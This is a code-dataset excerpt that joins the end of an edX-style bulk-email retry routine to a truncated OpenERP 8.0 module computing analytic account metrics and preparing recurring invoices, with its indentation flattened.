# The value for max_retries is increased by the number of times an "infinite-retry" exception
# has been retried. We want the regular retries to trigger max-retry checking, but not these
# special retries. So we count them separately.
max_retries = _get_current_task().max_retries + subtask_status.retried_nomax
base_delay = _get_current_task().default_retry_delay
if skip_retry_max:
# once we reach five retries, don't increase the countdown further.
retry_index = min(subtask_status.retried_nomax, 5)
exception_type = 'sending-rate'
# if we have a cap, after all, apply it now:
if hasattr(settings, 'BULK_EMAIL_INFINITE_RETRY_CAP'):
retry_cap = settings.BULK_EMAIL_INFINITE_RETRY_CAP + subtask_status.retried_withmax
max_retries = min(max_retries, retry_cap)
else:
retry_index = subtask_status.retried_withmax
exception_type = 'transient'
# Skew the new countdown value by a random factor, so that not all
# retries are deferred by the same amount.
countdown = ((2 ** retry_index) * base_delay) * random.uniform(.75, 1.25)
log.warning('Task %s: email with id %d not delivered due to %s error %s, retrying send to %d recipients in %s seconds (with max_retry=%s)',
task_id, email_id, exception_type, current_exception, len(to_list), countdown, max_retries)
# we make sure that we update the InstructorTask with the current subtask status
# *before* actually calling retry(), to be sure that there is no race
# condition between this update and the update made by the retried task.
update_subtask_status(entry_id, task_id, subtask_status)
# Now attempt the retry. If it succeeds, it returns a RetryTaskError that
# needs to be returned back to Celery. If it fails, we return the existing
# exception.
try:
retry_task = send_course_email.retry(
args=[
entry_id,
email_id,
to_list,
global_email_context,
subtask_status.to_dict(),
],
exc=current_exception,
countdown=countdown,
max_retries=max_retries,
throw=True,
)
raise retry_task
except RetryTaskError as retry_error:
# If the retry call is successful, update with the current progress:
log.exception(u'Task %s: email with id %d caused send_course_email task to retry.',
task_id, email_id)
return subtask_status, retry_error
except Exception as retry_exc:
# If there are no more retries, because the maximum has been reached,
# we expect the original exception to be raised. We catch it here
# (and put it in retry_exc just in case it's different, but it shouldn't be),
# and update status as if it were any other failure. That means that
# the recipients still in the to_list are counted as failures.
log.exception(u'Task %s: email with id %d caused send_course_email task to fail to retry. To list: %s',
task_id, email_id, [i['email'] for i in to_list])
num_failed = len(to_list)
subtask_status.increment(failed=num_failed, state=FAILURE)
return subtask_status, retry_exc
def _statsd_tag(course_title):
"""
Prefix the tag we will use for DataDog.
The tag also gets modified by our dogstats_wrapper code.
"""
return u"course_email:{0}".format(course_title)
|
aaltinisik/OCBAltinkaya | refs/heads/8.0 | addons/account_analytic_analysis/account_analytic_analysis.py | 38 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from dateutil.relativedelta import relativedelta
import datetime
import logging
import time
from openerp.osv import osv, fields
import openerp.tools
from openerp.tools.translate import _
from openerp.addons.decimal_precision import decimal_precision as dp
_logger = logging.getLogger(__name__)
class account_analytic_invoice_line(osv.osv):
_name = "account.analytic.invoice.line"
def _amount_line(self, cr, uid, ids, prop, unknow_none, unknow_dict, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.quantity * line.price_unit
if line.analytic_account_id.pricelist_id:
cur = line.analytic_account_id.pricelist_id.currency_id
res[line.id] = self.pool.get('res.currency').round(cr, uid, cur, res[line.id])
return res
_columns = {
'product_id': fields.many2one('product.product','Product',required=True),
'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account', ondelete='cascade'),
'name': fields.text('Description', required=True),
'quantity': fields.float('Quantity', required=True),
'uom_id': fields.many2one('product.uom', 'Unit of Measure',required=True),
'price_unit': fields.float('Unit Price', required=True),
'price_subtotal': fields.function(_amount_line, string='Sub Total', type="float",digits_compute= dp.get_precision('Account')),
}
_defaults = {
'quantity' : 1,
}
def product_id_change(self, cr, uid, ids, product, uom_id, qty=0, name='', partner_id=False, price_unit=False, pricelist_id=False, company_id=None, context=None):
context = context or {}
uom_obj = self.pool.get('product.uom')
company_id = company_id or False
local_context = dict(context, company_id=company_id, force_company=company_id, pricelist=pricelist_id)
if not product:
return {'value': {'price_unit': 0.0}, 'domain':{'product_uom':[]}}
if partner_id:
part = self.pool.get('res.partner').browse(cr, uid, partner_id, context=local_context)
if part.lang:
local_context.update({'lang': part.lang})
result = {}
res = self.pool.get('product.product').browse(cr, uid, product, context=local_context)
price = False
if price_unit is not False:
price = price_unit
elif pricelist_id:
price = res.price
if price is False:
price = res.list_price
if not name:
name = self.pool.get('product.product').name_get(cr, uid, [res.id], context=local_context)[0][1]
if res.description_sale:
name += '\n'+res.description_sale
result.update({'name': name or False,'uom_id': uom_id or res.uom_id.id or False, 'price_unit': price})
res_final = {'value':result}
if result['uom_id'] != res.uom_id.id:
selected_uom = uom_obj.browse(cr, uid, result['uom_id'], context=local_context)
new_price = uom_obj._compute_price(cr, uid, res.uom_id.id, res_final['value']['price_unit'], result['uom_id'])
res_final['value']['price_unit'] = new_price
return res_final
class account_analytic_account(osv.osv):
_name = "account.analytic.account"
_inherit = "account.analytic.account"
def _analysis_all(self, cr, uid, ids, fields, arg, context=None):
dp = 2
res = dict([(i, {}) for i in ids])
parent_ids = tuple(ids) #We don't want consolidation for each of these fields because those complex computation is resource-greedy.
accounts = self.browse(cr, uid, ids, context=context)
for f in fields:
if f == 'user_ids':
cr.execute('SELECT MAX(id) FROM res_users')
max_user = cr.fetchone()[0]
if parent_ids:
cr.execute('SELECT DISTINCT("user") FROM account_analytic_analysis_summary_user ' \
'WHERE account_id IN %s AND unit_amount <> 0.0', (parent_ids,))
result = cr.fetchall()
else:
result = []
for id in ids:
res[id][f] = [int((id * max_user) + x[0]) for x in result]
elif f == 'month_ids':
if parent_ids:
cr.execute('SELECT DISTINCT(month_id) FROM account_analytic_analysis_summary_month ' \
'WHERE account_id IN %s AND unit_amount <> 0.0', (parent_ids,))
result = cr.fetchall()
else:
result = []
for id in ids:
res[id][f] = [int(id * 1000000 + int(x[0])) for x in result]
elif f == 'last_worked_invoiced_date':
for id in ids:
res[id][f] = False
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, MAX(date) \
FROM account_analytic_line \
WHERE account_id IN %s \
AND invoice_id IS NOT NULL \
GROUP BY account_analytic_line.account_id;", (parent_ids,))
for account_id, sum in cr.fetchall():
if account_id not in res:
res[account_id] = {}
res[account_id][f] = sum
elif f == 'ca_to_invoice':
for id in ids:
res[id][f] = 0.0
res2 = {}
for account in accounts:
cr.execute("""
SELECT product_id, sum(amount), user_id, to_invoice, sum(unit_amount), product_uom_id, line.name
FROM account_analytic_line line
LEFT JOIN account_analytic_journal journal ON (journal.id = line.journal_id)
WHERE account_id = %s
AND journal.type != 'purchase'
AND invoice_id IS NULL
AND to_invoice IS NOT NULL
GROUP BY product_id, user_id, to_invoice, product_uom_id, line.name""", (account.id,))
res[account.id][f] = 0.0
for product_id, price, user_id, factor_id, qty, uom, line_name in cr.fetchall():
price = -price
if product_id:
price = self.pool.get('account.analytic.line')._get_invoice_price(cr, uid, account, product_id, user_id, qty, context)
factor = self.pool.get('hr_timesheet_invoice.factor').browse(cr, uid, factor_id, context=context)
res[account.id][f] += price * qty * (100-factor.factor or 0.0) / 100.0
# sum both result on account_id
for id in ids:
res[id][f] = round(res.get(id, {}).get(f, 0.0), dp) + round(res2.get(id, 0.0), 2)
elif f == 'last_invoice_date':
for id in ids:
res[id][f] = False
if parent_ids:
cr.execute ("SELECT account_analytic_line.account_id, \
DATE(MAX(account_invoice.date_invoice)) \
FROM account_analytic_line \
JOIN account_invoice \
ON account_analytic_line.invoice_id = account_invoice.id \
WHERE account_analytic_line.account_id IN %s \
AND account_analytic_line.invoice_id IS NOT NULL \
GROUP BY account_analytic_line.account_id",(parent_ids,))
for account_id, lid in cr.fetchall():
res[account_id][f] = lid
elif f == 'last_worked_date':
for id in ids:
res[id][f] = False
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, MAX(date) \
FROM account_analytic_line \
WHERE account_id IN %s \
AND invoice_id IS NULL \
GROUP BY account_analytic_line.account_id",(parent_ids,))
for account_id, lwd in cr.fetchall():
if account_id not in res:
res[account_id] = {}
res[account_id][f] = lwd
elif f == 'hours_qtt_non_invoiced':
for id in ids:
res[id][f] = 0.0
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, COALESCE(SUM(unit_amount), 0.0) \
FROM account_analytic_line \
JOIN account_analytic_journal \
ON account_analytic_line.journal_id = account_analytic_journal.id \
WHERE account_analytic_line.account_id IN %s \
AND account_analytic_journal.type='general' \
AND invoice_id IS NULL \
AND to_invoice IS NOT NULL \
GROUP BY account_analytic_line.account_id;",(parent_ids,))
for account_id, sua in cr.fetchall():
if account_id not in res:
res[account_id] = {}
res[account_id][f] = round(sua, dp)
for id in ids:
res[id][f] = round(res[id][f], dp)
elif f == 'hours_quantity':
for id in ids:
res[id][f] = 0.0
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, COALESCE(SUM(unit_amount), 0.0) \
FROM account_analytic_line \
JOIN account_analytic_journal \
ON account_analytic_line.journal_id = account_analytic_journal.id \
WHERE account_analytic_line.account_id IN %s \
AND account_analytic_journal.type='general' \
GROUP BY account_analytic_line.account_id",(parent_ids,))
ff = cr.fetchall()
for account_id, hq in ff:
if account_id not in res:
res[account_id] = {}
res[account_id][f] = round(hq, dp)
for id in ids:
res[id][f] = round(res[id][f], dp)
elif f == 'ca_theorical':
# TODO Take care of pricelist and purchase !
for id in ids:
res[id][f] = 0.0
# Warning
# This computation doesn't take care of pricelist !
# Just consider list_price
if parent_ids:
cr.execute("""SELECT account_analytic_line.account_id AS account_id, \
COALESCE(SUM((account_analytic_line.unit_amount * pt.list_price) \
- (account_analytic_line.unit_amount * pt.list_price \
* hr.factor)), 0.0) AS somme
FROM account_analytic_line \
LEFT JOIN account_analytic_journal \
ON (account_analytic_line.journal_id = account_analytic_journal.id) \
JOIN product_product pp \
ON (account_analytic_line.product_id = pp.id) \
JOIN product_template pt \
ON (pp.product_tmpl_id = pt.id) \
JOIN account_analytic_account a \
ON (a.id=account_analytic_line.account_id) \
JOIN hr_timesheet_invoice_factor hr \
ON (hr.id=a.to_invoice) \
WHERE account_analytic_line.account_id IN %s \
AND a.to_invoice IS NOT NULL \
AND account_analytic_journal.type IN ('purchase', 'general')
GROUP BY account_analytic_line.account_id""",(parent_ids,))
for account_id, sum in cr.fetchall():
res[account_id][f] = round(sum, dp)
return res
def _ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
res_final = {}
child_ids = tuple(ids) #We don't want consolidation for each of these fields because those complex computation is resource-greedy.
for i in child_ids:
res[i] = 0.0
if not child_ids:
return res
if child_ids:
#Search all invoice lines not in cancelled state that refer to this analytic account
inv_line_obj = self.pool.get("account.invoice.line")
inv_lines = inv_line_obj.search(cr, uid, ['&', ('account_analytic_id', 'in', child_ids), ('invoice_id.state', 'not in', ['draft', 'cancel']), ('invoice_id.type', 'in', ['out_invoice', 'out_refund'])], context=context)
for line in inv_line_obj.browse(cr, uid, inv_lines, context=context):
if line.invoice_id.type == 'out_refund':
res[line.account_analytic_id.id] -= line.price_subtotal
else:
res[line.account_analytic_id.id] += line.price_subtotal
for acc in self.browse(cr, uid, res.keys(), context=context):
res[acc.id] = res[acc.id] - (acc.timesheet_ca_invoiced or 0.0)
res_final = res
return res_final
def _total_cost_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
res_final = {}
child_ids = tuple(ids) #We don't want consolidation for each of these fields because those complex computation is resource-greedy.
for i in child_ids:
res[i] = 0.0
if not child_ids:
return res
if child_ids:
cr.execute("""SELECT account_analytic_line.account_id, COALESCE(SUM(amount), 0.0) \
FROM account_analytic_line \
JOIN account_analytic_journal \
ON account_analytic_line.journal_id = account_analytic_journal.id \
WHERE account_analytic_line.account_id IN %s \
AND amount<0 \
GROUP BY account_analytic_line.account_id""",(child_ids,))
for account_id, sum in cr.fetchall():
res[account_id] = round(sum,2)
res_final = res
return res_final
def _remaining_hours_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.quantity_max != 0:
res[account.id] = account.quantity_max - account.hours_quantity
else:
res[account.id] = 0.0
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _remaining_hours_to_invoice_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = max(account.hours_qtt_est - account.timesheet_ca_invoiced, account.ca_to_invoice)
return res
def _hours_qtt_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = account.hours_quantity - account.hours_qtt_non_invoiced
if res[account.id] < 0:
res[account.id] = 0.0
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _revenue_per_hour_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.hours_qtt_invoiced == 0:
res[account.id]=0.0
else:
res[account.id] = account.ca_invoiced / account.hours_qtt_invoiced
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _real_margin_rate_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.ca_invoiced == 0:
res[account.id]=0.0
elif account.total_cost != 0.0:
res[account.id] = -(account.real_margin / account.total_cost) * 100
else:
res[account.id] = 0.0
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _fix_price_to_invoice_calc(self, cr, uid, ids, name, arg, context=None):
sale_obj = self.pool.get('sale.order')
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = 0.0
sale_ids = sale_obj.search(cr, uid, [('project_id','=', account.id), ('state', '=', 'manual')], context=context)
for sale in sale_obj.browse(cr, uid, sale_ids, context=context):
res[account.id] += sale.amount_untaxed
for invoice in sale.invoice_ids:
if invoice.state != 'cancel':
res[account.id] -= invoice.amount_untaxed
return res
def _timesheet_ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
lines_obj = self.pool.get('account.analytic.line')
res = {}
inv_ids = []
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = 0.0
line_ids = lines_obj.search(cr, uid, [('account_id','=', account.id), ('invoice_id','!=',False), ('invoice_id.state', 'not in', ['draft', 'cancel']), ('to_invoice','!=', False), ('journal_id.type', '=', 'general'), ('invoice_id.type', 'in', ['out_invoice', 'out_refund'])], context=context)
for line in lines_obj.browse(cr, uid, line_ids, context=context):
if line.invoice_id not in inv_ids:
inv_ids.append(line.invoice_id)
if line.invoice_id.type == 'out_refund':
res[account.id] -= line.invoice_id.amount_untaxed
else:
res[account.id] += line.invoice_id.amount_untaxed
return res
def _remaining_ca_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = max(account.amount_max - account.ca_invoiced, account.fix_price_to_invoice)
return res
def _real_margin_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = account.ca_invoiced + account.total_cost
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _theorical_margin_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = account.ca_theorical + account.total_cost
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _is_overdue_quantity(self, cr, uid, ids, fieldnames, args, context=None):
result = dict.fromkeys(ids, 0)
for record in self.browse(cr, uid, ids, context=context):
if record.quantity_max > 0.0:
result[record.id] = int(record.hours_quantity > record.quantity_max)
else:
result[record.id] = 0
return result
def _get_analytic_account(self, cr, uid, ids, context=None):
result = set()
for line in self.pool.get('account.analytic.line').browse(cr, uid, ids, context=context):
result.add(line.account_id.id)
return list(result)
def _get_total_estimation(self, account):
tot_est = 0.0
if account.fix_price_invoices:
tot_est += account.amount_max
if account.invoice_on_timesheets:
tot_est += account.hours_qtt_est
return tot_est
def _get_total_invoiced(self, account):
total_invoiced = 0.0
if account.fix_price_invoices:
total_invoiced += account.ca_invoiced
if account.invoice_on_timesheets:
total_invoiced += account.timesheet_ca_invoiced
return total_invoiced
def _get_total_remaining(self, account):
total_remaining = 0.0
if account.fix_price_invoices:
total_remaining += account.remaining_ca
if account.invoice_on_timesheets:
total_remaining += account.remaining_hours_to_invoice
return total_remaining
def _get_total_toinvoice(self, account):
total_toinvoice = 0.0
if account.fix_price_invoices:
total_toinvoice += account.fix_price_to_invoice
if account.invoice_on_timesheets:
total_toinvoice += account.ca_to_invoice
return total_toinvoice
def _sum_of_fields(self, cr, uid, ids, name, arg, context=None):
res = dict([(i, {}) for i in ids])
for account in self.browse(cr, uid, ids, context=context):
res[account.id]['est_total'] = self._get_total_estimation(account)
res[account.id]['invoiced_total'] = self._get_total_invoiced(account)
res[account.id]['remaining_total'] = self._get_total_remaining(account)
res[account.id]['toinvoice_total'] = self._get_total_toinvoice(account)
return res
_columns = {
'is_overdue_quantity' : fields.function(_is_overdue_quantity, method=True, type='boolean', string='Overdue Quantity',
store={
'account.analytic.line' : (_get_analytic_account, None, 20),
'account.analytic.account': (lambda self, cr, uid, ids, c=None: ids, ['quantity_max'], 10),
}),
'ca_invoiced': fields.function(_ca_invoiced_calc, type='float', string='Invoiced Amount',
help="Total customer invoiced amount for this account.",
digits_compute=dp.get_precision('Account')),
'total_cost': fields.function(_total_cost_calc, type='float', string='Total Costs',
help="Total of costs for this account. It includes real costs (from invoices) and indirect costs, like time spent on timesheets.",
digits_compute=dp.get_precision('Account')),
'ca_to_invoice': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Uninvoiced Amount',
help="If invoice from analytic account, the remaining amount you can invoice to the customer based on the total costs.",
digits_compute=dp.get_precision('Account')),
'ca_theorical': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Theoretical Revenue',
help="Based on the costs you had on the project, what would have been the revenue if all these costs have been invoiced at the normal sale price provided by the pricelist.",
digits_compute=dp.get_precision('Account')),
'hours_quantity': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Total Worked Time',
help="Number of time you spent on the analytic account (from timesheet). It computes quantities on all journal of type 'general'."),
'last_invoice_date': fields.function(_analysis_all, multi='analytic_analysis', type='date', string='Last Invoice Date',
help="If invoice from the costs, this is the date of the latest invoiced."),
'last_worked_invoiced_date': fields.function(_analysis_all, multi='analytic_analysis', type='date', string='Date of Last Invoiced Cost',
help="If invoice from the costs, this is the date of the latest work or cost that have been invoiced."),
'last_worked_date': fields.function(_analysis_all, multi='analytic_analysis', type='date', string='Date of Last Cost/Work',
help="Date of the latest work done on this account."),
'hours_qtt_non_invoiced': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Uninvoiced Time',
help="Number of time (hours/days) (from journal of type 'general') that can be invoiced if you invoice based on analytic account."),
'hours_qtt_invoiced': fields.function(_hours_qtt_invoiced_calc, type='float', string='Invoiced Time',
help="Number of time (hours/days) that can be invoiced plus those that already have been invoiced."),
'remaining_hours': fields.function(_remaining_hours_calc, type='float', string='Remaining Time',
help="Computed using the formula: Maximum Time - Total Worked Time"),
'remaining_hours_to_invoice': fields.function(_remaining_hours_to_invoice_calc, type='float', string='Remaining Time',
help="Computed using the formula: Expected on timesheets - Total invoiced on timesheets"),
'fix_price_to_invoice': fields.function(_fix_price_to_invoice_calc, type='float', string='Remaining Time',
help="Sum of quotations for this contract."),
'timesheet_ca_invoiced': fields.function(_timesheet_ca_invoiced_calc, type='float', string='Remaining Time',
help="Sum of timesheet lines invoiced for this contract."),
'remaining_ca': fields.function(_remaining_ca_calc, type='float', string='Remaining Revenue',
help="Computed using the formula: Max Invoice Price - Invoiced Amount.",
digits_compute=dp.get_precision('Account')),
'revenue_per_hour': fields.function(_revenue_per_hour_calc, type='float', string='Revenue per Time (real)',
help="Computed using the formula: Invoiced Amount / Total Time",
digits_compute=dp.get_precision('Account')),
'real_margin': fields.function(_real_margin_calc, type='float', string='Real Margin',
help="Computed using the formula: Invoiced Amount - Total Costs.",
digits_compute=dp.get_precision('Account')),
'theorical_margin': fields.function(_theorical_margin_calc, type='float', string='Theoretical Margin',
help="Computed using the formula: Theoretical Revenue - Total Costs",
digits_compute=dp.get_precision('Account')),
'real_margin_rate': fields.function(_real_margin_rate_calc, type='float', string='Real Margin Rate (%)',
help="Computes using the formula: (Real Margin / Total Costs) * 100.",
digits_compute=dp.get_precision('Account')),
'fix_price_invoices' : fields.boolean('Fixed Price'),
'invoice_on_timesheets' : fields.boolean("On Timesheets"),
'month_ids': fields.function(_analysis_all, multi='analytic_analysis', type='many2many', relation='account_analytic_analysis.summary.month', string='Month'),
'user_ids': fields.function(_analysis_all, multi='analytic_analysis', type="many2many", relation='account_analytic_analysis.summary.user', string='User'),
'hours_qtt_est': fields.float('Estimation of Hours to Invoice'),
'est_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total Estimation"),
'invoiced_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total Invoiced"),
'remaining_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total Remaining", help="Expectation of remaining income for this contract. Computed as the sum of remaining subtotals which, in turn, are computed as the maximum between '(Estimation - Invoiced)' and 'To Invoice' amounts"),
'toinvoice_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total to Invoice", help=" Sum of everything that could be invoiced for this contract."),
'recurring_invoice_line_ids': fields.one2many('account.analytic.invoice.line', 'analytic_account_id', 'Invoice Lines', copy=True),
'recurring_invoices' : fields.boolean('Generate recurring invoices automatically'),
'recurring_rule_type': fields.selection([
('daily', 'Day(s)'),
('weekly', 'Week(s)'),
('monthly', 'Month(s)'),
('yearly', 'Year(s)'),
], 'Recurrency', help="Invoice automatically repeat at specified interval"),
'recurring_interval': fields.integer('Repeat Every', help="Repeat every (Days/Week/Month/Year)"),
'recurring_next_date': fields.date('Date of Next Invoice'),
}
_defaults = {
'recurring_interval': 1,
'recurring_next_date': lambda *a: time.strftime('%Y-%m-%d'),
'recurring_rule_type':'monthly'
}
def open_sale_order_lines(self,cr,uid,ids,context=None):
if context is None:
context = {}
sale_ids = self.pool.get('sale.order').search(cr,uid,[('project_id','=',context.get('search_default_project_id',False)),('partner_id','in',context.get('search_default_partner_id',False))])
names = [record.name for record in self.browse(cr, uid, ids, context=context)]
name = _('Sales Order Lines to Invoice of %s') % ','.join(names)
return {
'type': 'ir.actions.act_window',
'name': name,
'view_type': 'form',
'view_mode': 'tree,form',
'context': context,
'domain' : [('order_id','in',sale_ids)],
'res_model': 'sale.order.line',
'nodestroy': True,
}
def on_change_template(self, cr, uid, ids, template_id, date_start=False, context=None):
if not template_id:
return {}
res = super(account_analytic_account, self).on_change_template(cr, uid, ids, template_id, date_start=date_start, context=context)
template = self.browse(cr, uid, template_id, context=context)
if not ids:
res['value']['fix_price_invoices'] = template.fix_price_invoices
res['value']['amount_max'] = template.amount_max
if not ids:
res['value']['invoice_on_timesheets'] = template.invoice_on_timesheets
res['value']['hours_qtt_est'] = template.hours_qtt_est
if template.to_invoice.id:
res['value']['to_invoice'] = template.to_invoice.id
if template.pricelist_id.id:
res['value']['pricelist_id'] = template.pricelist_id.id
if not ids:
invoice_line_ids = []
for x in template.recurring_invoice_line_ids:
invoice_line_ids.append((0, 0, {
'product_id': x.product_id.id,
'uom_id': x.uom_id.id,
'name': x.name,
'quantity': x.quantity,
'price_unit': x.price_unit,
'analytic_account_id': x.analytic_account_id and x.analytic_account_id.id or False,
}))
res['value']['recurring_invoices'] = template.recurring_invoices
res['value']['recurring_interval'] = template.recurring_interval
res['value']['recurring_rule_type'] = template.recurring_rule_type
res['value']['recurring_invoice_line_ids'] = invoice_line_ids
return res
def onchange_recurring_invoices(self, cr, uid, ids, recurring_invoices, date_start=False, context=None):
value = {}
if date_start and recurring_invoices:
value = {'value': {'recurring_next_date': date_start}}
return value
def cron_account_analytic_account(self, cr, uid, context=None):
context = dict(context or {})
remind = {}
def fill_remind(key, domain, write_pending=False):
base_domain = [
('type', '=', 'contract'),
('partner_id', '!=', False),
('manager_id', '!=', False),
('manager_id.email', '!=', False),
]
base_domain.extend(domain)
accounts_ids = self.search(cr, uid, base_domain, context=context, order='name asc')
accounts = self.browse(cr, uid, accounts_ids, context=context)
for account in accounts:
if write_pending:
account.write({'state' : 'pending'})
remind_user = remind.setdefault(account.manager_id.id, {})
remind_type = remind_user.setdefault(key, {})
remind_partner = remind_type.setdefault(account.partner_id, []).append(account)
# Already expired
fill_remind("old", [('state', 'in', ['pending'])])
# Expires now
fill_remind("new", [('state', 'in', ['draft', 'open']), '|', '&', ('date', '!=', False), ('date', '<=', time.strftime('%Y-%m-%d')), ('is_overdue_quantity', '=', True)], True)
# Expires in less than 30 days
fill_remind("future", [('state', 'in', ['draft', 'open']), ('date', '!=', False), ('date', '<', (datetime.datetime.now() + datetime.timedelta(30)).strftime("%Y-%m-%d"))])
context['base_url'] = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
context['action_id'] = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'account_analytic_analysis', 'action_account_analytic_overdue_all')[1]
template_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'account_analytic_analysis', 'account_analytic_cron_email_template')[1]
for user_id, data in remind.items():
context["data"] = data
_logger.debug("Sending reminder to uid %s", user_id)
self.pool.get('email.template').send_mail(cr, uid, template_id, user_id, force_send=True, context=context)
return True
def onchange_invoice_on_timesheets(self, cr, uid, ids, invoice_on_timesheets, context=None):
if not invoice_on_timesheets:
return {'value': {'to_invoice': False}}
result = {'value': {'use_timesheets': True}}
try:
to_invoice = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'hr_timesheet_invoice', 'timesheet_invoice_factor1')
result['value']['to_invoice'] = to_invoice[1]
except ValueError:
pass
return result
def hr_to_invoice_timesheets(self, cr, uid, ids, context=None):
domain = [('invoice_id','=',False),('to_invoice','!=',False), ('journal_id.type', '=', 'general'), ('account_id', 'in', ids)]
names = [record.name for record in self.browse(cr, uid, ids, context=context)]
name = _('Timesheets to Invoice of %s') % ','.join(names)
return {
'type': 'ir.actions.act_window',
'name': name,
'view_type': 'form',
'view_mode': 'tree,form',
'domain' : domain,
'res_model': 'account.analytic.line',
'nodestroy': True,
}
def _prepare_invoice_data(self, cr, uid, contract, context=None):
context = context or {}
journal_obj = self.pool.get('account.journal')
fpos_obj = self.pool['account.fiscal.position']
partner = contract.partner_id
if not partner:
raise osv.except_osv(_('No Customer Defined!'),_("You must first select a Customer for Contract %s!") % contract.name )
fpos_id = fpos_obj.get_fiscal_position(cr, uid, context.get('force_company') or partner.company_id.id, partner.id, context=context)
journal_ids = journal_obj.search(cr, uid, [('type', '=','sale'),('company_id', '=', contract.company_id.id or False)], limit=1)
if not journal_ids:
raise osv.except_osv(_('Error!'),
_('Please define a sale journal for the company "%s".') % (contract.company_id.name or '', ))
partner_payment_term = partner.property_payment_term and partner.property_payment_term.id or False
currency_id = False
if contract.pricelist_id:
currency_id = contract.pricelist_id.currency_id.id
elif partner.property_product_pricelist:
currency_id = partner.property_product_pricelist.currency_id.id
elif contract.company_id:
currency_id = contract.company_id.currency_id.id
invoice = {
'account_id': partner.property_account_receivable.id,
'type': 'out_invoice',
'partner_id': partner.id,
'currency_id': currency_id,
'journal_id': len(journal_ids) and journal_ids[0] or False,
'date_invoice': contract.recurring_next_date,
'origin': contract.code,
'fiscal_position': fpos_id,
'payment_term': partner_payment_term,
'company_id': contract.company_id.id or False,
'user_id': contract.manager_id.id or uid,
'comment': contract.description,
}
return invoice
def _prepare_invoice_line(self, cr, uid, line, fiscal_position, context=None):
fpos_obj = self.pool.get('account.fiscal.position')
res = line.product_id
account_id = res.property_account_income.id
if not account_id:
account_id = res.categ_id.property_account_income_categ.id
account_id = fpos_obj.map_account(cr, uid, fiscal_position, account_id)
taxes = res.taxes_id or False
tax_id = fpos_obj.map_tax(cr, uid, fiscal_position, taxes, context=context)
values = {
'name': line.name,
'account_id': account_id,
'account_analytic_id': line.analytic_account_id.id,
'price_unit': line.price_unit or 0.0,
'quantity': line.quantity,
'uos_id': line.uom_id.id or False,
'product_id': line.product_id.id or False,
'invoice_line_tax_id': [(6, 0, tax_id)],
}
return values
def _prepare_invoice_lines(self, cr, uid, contract, fiscal_position_id, context=None):
fpos_obj = self.pool.get('account.fiscal.position')
fiscal_position = None
if fiscal_position_id:
fiscal_position = fpos_obj.browse(cr, uid, fiscal_position_id, context=context)
invoice_lines = []
for line in contract.recurring_invoice_line_ids:
values = self._prepare_invoice_line(cr, uid, line, fiscal_position, context=context)
invoice_lines.append((0, 0, values))
return invoice_lines
def _prepare_invoice(self, cr, uid, contract, context=None):
invoice = self._prepare_invoice_data(cr, uid, contract, context=context)
invoice['invoice_line'] = self._prepare_invoice_lines(cr, uid, contract, invoice['fiscal_position'], context=context)
return invoice
def recurring_create_invoice(self, cr, uid, ids, context=None):
return self._recurring_create_invoice(cr, uid, ids, context=context)
def _cron_recurring_create_invoice(self, cr, uid, context=None):
return self._recurring_create_invoice(cr, uid, [], automatic=True, context=context)
def _recurring_create_invoice(self, cr, uid, ids, automatic=False, context=None):
context = context or {}
invoice_ids = []
current_date = time.strftime('%Y-%m-%d')
if ids:
contract_ids = ids
else:
contract_ids = self.search(cr, uid, [('recurring_next_date','<=', current_date), ('state','=', 'open'), ('recurring_invoices','=', True), ('type', '=', 'contract')])
if contract_ids:
